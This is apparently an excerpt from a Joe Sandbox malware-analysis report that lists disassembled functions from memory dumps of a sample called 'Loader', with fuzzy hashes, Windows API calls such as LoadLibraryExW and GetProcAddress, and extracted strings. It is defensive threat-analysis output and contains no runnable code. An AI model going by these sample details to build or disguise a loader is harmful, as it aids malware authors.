                                                                                                  • Instruction ID: e4f9f53d04bb4b4e37a399d2457c6468f05331b7756921d25a22280c4e09e4b1
                                                                                                  • Opcode Fuzzy Hash: 5ad0eab283cb8162b88b37a419750366b8c88abffe48aaceff3d0d16a008bac0
                                                                                                  • Instruction Fuzzy Hash: C4019EB5B0031247D7209E12B4D0B27B6A97F85708F58043EE80857342EB79FC04C6AA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9fb21b2599045b7306dfe0807e4f79091f7fb4025ec3ad3bc26d91b2c3755759
                                                                                                  • Instruction ID: a3859e5903b0692b7f595e9ec6898d2c18e9bf4300c618997e59bcefe4575cdf
                                                                                                  • Opcode Fuzzy Hash: 9fb21b2599045b7306dfe0807e4f79091f7fb4025ec3ad3bc26d91b2c3755759
                                                                                                  • Instruction Fuzzy Hash: 59F04C1170D39249D305CD3AA95072FBFE34BE3204F28899DD0D193696C53CC60B8767
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a5304366060603d9e6070e924a72f504a79de3e323384e501256cdf50a4fd8c0
                                                                                                  • Instruction ID: b3fff304718bc1e3ebc63f3265517ee6a507b27ac2106177c3cf1498ccc0d539
                                                                                                  • Opcode Fuzzy Hash: a5304366060603d9e6070e924a72f504a79de3e323384e501256cdf50a4fd8c0
                                                                                                  • Instruction Fuzzy Hash: 04F02B3F7592190BE310DD69ECC49ABB3A6DBCA318B1D8139E540E3381D978F806C2A4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3be55a6c6b8bcf3a2c38d0306ed4298fd175d9151382c7c08fa7277d504d8f44
                                                                                                  • Instruction ID: dac493e1958b65fc395e248453cded7e40fd2d2abbe7effc686b37bd14218719
                                                                                                  • Opcode Fuzzy Hash: 3be55a6c6b8bcf3a2c38d0306ed4298fd175d9151382c7c08fa7277d504d8f44
                                                                                                  • Instruction Fuzzy Hash: 5301C0745183418BE714DF25A882B7FBBE1AB96308F10592CE085A7246D738D50ACF6B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f5cb8ab814211c08f25325b5d2731500334c4a7223d1eda04732de4ef483873
                                                                                                  • Instruction ID: 36bff6e06377b7d15ce570ffe6a33885d458dd8013399b1ec3a904a7448b5eed
                                                                                                  • Opcode Fuzzy Hash: 9f5cb8ab814211c08f25325b5d2731500334c4a7223d1eda04732de4ef483873
                                                                                                  • Instruction Fuzzy Hash: E0D0123571820147C7988F2CC84673BF2A2934B260F65EA395012E3380CE21C80B480C
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseFileHandleProcSize
                                                                                                  • String ID: CreateFileA
                                                                                                  • API String ID: 2836222988-1429953656
                                                                                                  • Opcode ID: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
                                                                                                  • Instruction ID: 9ced4854466b94e310d836d3756a39455da84b23b0bbf02b7e6ea236ac85a499
                                                                                                  • Opcode Fuzzy Hash: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
                                                                                                  • Instruction Fuzzy Hash: FD41B5B4D083099FCB04EFA8D4986AEBBF0EF49315F048529E899E7350D7749545CFA2
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction ID: 15fad44837684110af583bd7997a4025f4bfbafedad3228c435e9b08788fcfd7
                                                                                                  • Opcode Fuzzy Hash: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction Fuzzy Hash: D1710432940215ABDF209F94CC42BAE7BB9EF4531AF280055FC14B7281D7B5DC888776
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction ID: 497d89c6443eeaffc1686b007b2b10de8b68db27d4be154b6bcbdbf5d3660270
                                                                                                  • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction Fuzzy Hash: 86B14872D00395AFDB11CF28CC91BAEBBA5EF55390F284165E944AB282DB74D901DBB0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3ABE7
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D3ABEF
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3AC78
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D3ACA3
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3ACF8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: a571cd8ac4076e4986b1c1358d13404b066a899ff4594213489be66db604a694
                                                                                                  • Instruction ID: 04a725aeb7ad087668dc9e3e3abc5b502a497555bf7b0e95f1626cddb5f08e7e
                                                                                                  • Opcode Fuzzy Hash: a571cd8ac4076e4986b1c1358d13404b066a899ff4594213489be66db604a694
                                                                                                  • Instruction Fuzzy Hash: 9041AF38A00218AFCF10DF6CD885A9EBBA5EF45324F188155E8599B352D731EE05CBB2
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00D46751,00000000,00000000,00000000,00000000), ref: 00D46703
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: 5ea059118a21a2bab98ed301419ca2ecf58d7646e8a24b2bcd074a5b03cf9cdf
                                                                                                  • Instruction ID: e5a707df0560b4bd2020fbd37777e3ea9b9e7c5905af68f184b3d023081109dc
                                                                                                  • Opcode Fuzzy Hash: 5ea059118a21a2bab98ed301419ca2ecf58d7646e8a24b2bcd074a5b03cf9cdf
                                                                                                  • Instruction Fuzzy Hash: CC210A32A01320ABC735AB65DC45A5A7768DB42771F2A0150FD07E7391EB70EE00DAF2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 88af6967fd340fb4269c310200c07196bbefa00128e9814186d41743023161ea
                                                                                                  • Instruction ID: e89031d6cab983fc1354dca7e7acf0676c57ee8662a3915dec6c72abab4e2e37
                                                                                                  • Opcode Fuzzy Hash: 88af6967fd340fb4269c310200c07196bbefa00128e9814186d41743023161ea
                                                                                                  • Instruction Fuzzy Hash: E0B1DF70A04749AFDF15DFA8D841BAEBBB1EF46391F184148EC0597392C7709A49CB70
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00D44464,00D3A97D,00D39BD4), ref: 00D4447B
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D44489
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D444A2
                                                                                                  • SetLastError.KERNEL32(00000000,00D44464,00D3A97D,00D39BD4), ref: 00D444F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
                                                                                                  • Instruction ID: 2a2c44b47891669cfed7256225866c803f4f4f17fc0810a20fed78d418c190dc
                                                                                                  • Opcode Fuzzy Hash: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
                                                                                                  • Instruction Fuzzy Hash: 5E01843211A7115FF7243BB4BC85B672B89EB41775B29023AF914952F2EFD14C829670
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D44E6B
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D450E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: f8e01ee9695aa7a1621ff591ba9f891babdc44eee076efc6e0ce4a6f9d80b029
                                                                                                  • Instruction ID: ed31a868cd5321ec647d1e91ff8bc8395a42fdebdf87c4cdee71cf624081aab5
                                                                                                  • Opcode Fuzzy Hash: f8e01ee9695aa7a1621ff591ba9f891babdc44eee076efc6e0ce4a6f9d80b029
                                                                                                  • Instruction Fuzzy Hash: 97B18B75800209EFCF24DFA4D881AAEB7B5FF04310F18456AF9156B216D771DAA1CBB2
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F22D
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D3F23F
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F261
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: fcadb86682caeb6c0b36a7c8bd516aab2436f8c4bafab8c9d886aadd38877402
                                                                                                  • Instruction ID: 19c9fd0b4ffd320f8a5de00617401f9efeb104b62fb56d3ee2ba223dfddaa6d6
                                                                                                  • Opcode Fuzzy Hash: fcadb86682caeb6c0b36a7c8bd516aab2436f8c4bafab8c9d886aadd38877402
                                                                                                  • Instruction Fuzzy Hash: 3B018B35940769EFDB059B50DC0ABAEBBB8FB44B16F040625EC11E22D0DBB49A04CAA0
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D46EAF
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D46F78
                                                                                                  • __freea.LIBCMT ref: 00D46FDF
                                                                                                    • Part of subcall function 00D456F1: HeapAlloc.KERNEL32(00000000,00D47675,?,?,00D47675,00000220,?,?,?), ref: 00D45723
                                                                                                  • __freea.LIBCMT ref: 00D46FF2
                                                                                                  • __freea.LIBCMT ref: 00D46FFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096550386-0
                                                                                                  • Opcode ID: 783123bdf89d4cb1c42dfc80df6de212082a5b9fdd2d4c07e36eccd10862b833
                                                                                                  • Instruction ID: f117788a03bf22b92fca1f6e2ed31357fbff232d0f9cbaf87a4925d3b4c0db59
                                                                                                  • Opcode Fuzzy Hash: 783123bdf89d4cb1c42dfc80df6de212082a5b9fdd2d4c07e36eccd10862b833
                                                                                                  • Instruction Fuzzy Hash: E851D2B2600246AFDB249F64EC81EBB7BA9EF46750F190039FD46D6111EB71DC1486B2
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00D377F9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D37804
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D37872
                                                                                                    • Part of subcall function 00D376EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D37707
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D3781F
                                                                                                  • _Yarn.LIBCPMT ref: 00D37835
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: 0d27a0d00a7930cfde7a6aa410c99e73242167045337e3fd9f6c7c04f5b8a608
                                                                                                  • Instruction ID: 6c13d9a841796326f921d460dd9bc3019e020dc52b04ec0b0158db74c1a55451
                                                                                                  • Opcode Fuzzy Hash: 0d27a0d00a7930cfde7a6aa410c99e73242167045337e3fd9f6c7c04f5b8a608
                                                                                                  • Instruction Fuzzy Hash: 040171B5A04A109BCB19EF20D85657DBB71FF94391F180109E80297391DF74AE06CBB1
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: 8$; ,)$?&x+
                                                                                                  • API String ID: 3664257935-698864271
                                                                                                  • Opcode ID: 7cacce0c834436207cd57b150df84d206e5a20959e270bd10df77e3c12d72150
                                                                                                  • Instruction ID: f61e7c6feb1fb3cff13d09e1b823ee3ca1198c28b11f72e968cf9931f2d4ca0b
                                                                                                  • Opcode Fuzzy Hash: 7cacce0c834436207cd57b150df84d206e5a20959e270bd10df77e3c12d72150
                                                                                                  • Instruction Fuzzy Hash: 11518A7160C3C08BD3298B259C617AB7FD2EFD6315F14496EE4D69B3C1DA38480A8B96
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427925
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: :W>Q$RS$V3O=
                                                                                                  • API String ID: 237503144-1471300816
                                                                                                  • Opcode ID: 812a10ede99184916d5deaba522e6daaa31afb59f4d5399b3485b067a8fe9f42
                                                                                                  • Instruction ID: b2015f67af00bc3547ee0789a9497bd762dab28044029c4783bf94bd501ace18
                                                                                                  • Opcode Fuzzy Hash: 812a10ede99184916d5deaba522e6daaa31afb59f4d5399b3485b067a8fe9f42
                                                                                                  • Instruction Fuzzy Hash: 8341537668C3548FC324CF55998028FFBE0EBD4714F0A4A2CE9E967391D7B49906CB86
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: FreeConsole$kernel32.dll
                                                                                                  • API String ID: 1646373207-2564406000
                                                                                                  • Opcode ID: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
                                                                                                  • Instruction ID: a7490486963df065302b76c098ad7f38ca6a064f4f5e8cb866b260b06e357f5f
                                                                                                  • Opcode Fuzzy Hash: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
                                                                                                  • Instruction Fuzzy Hash: 2C0166B0E043089FCB44EFB8D94559DBBF4EB48301F41856AE849D7351EB74A6548FA2
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC), ref: 00D4F6BD
                                                                                                  • GetLastError.KERNEL32(?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC,00000000,?,00D4539C), ref: 00D4F6C7
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D4F6EF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
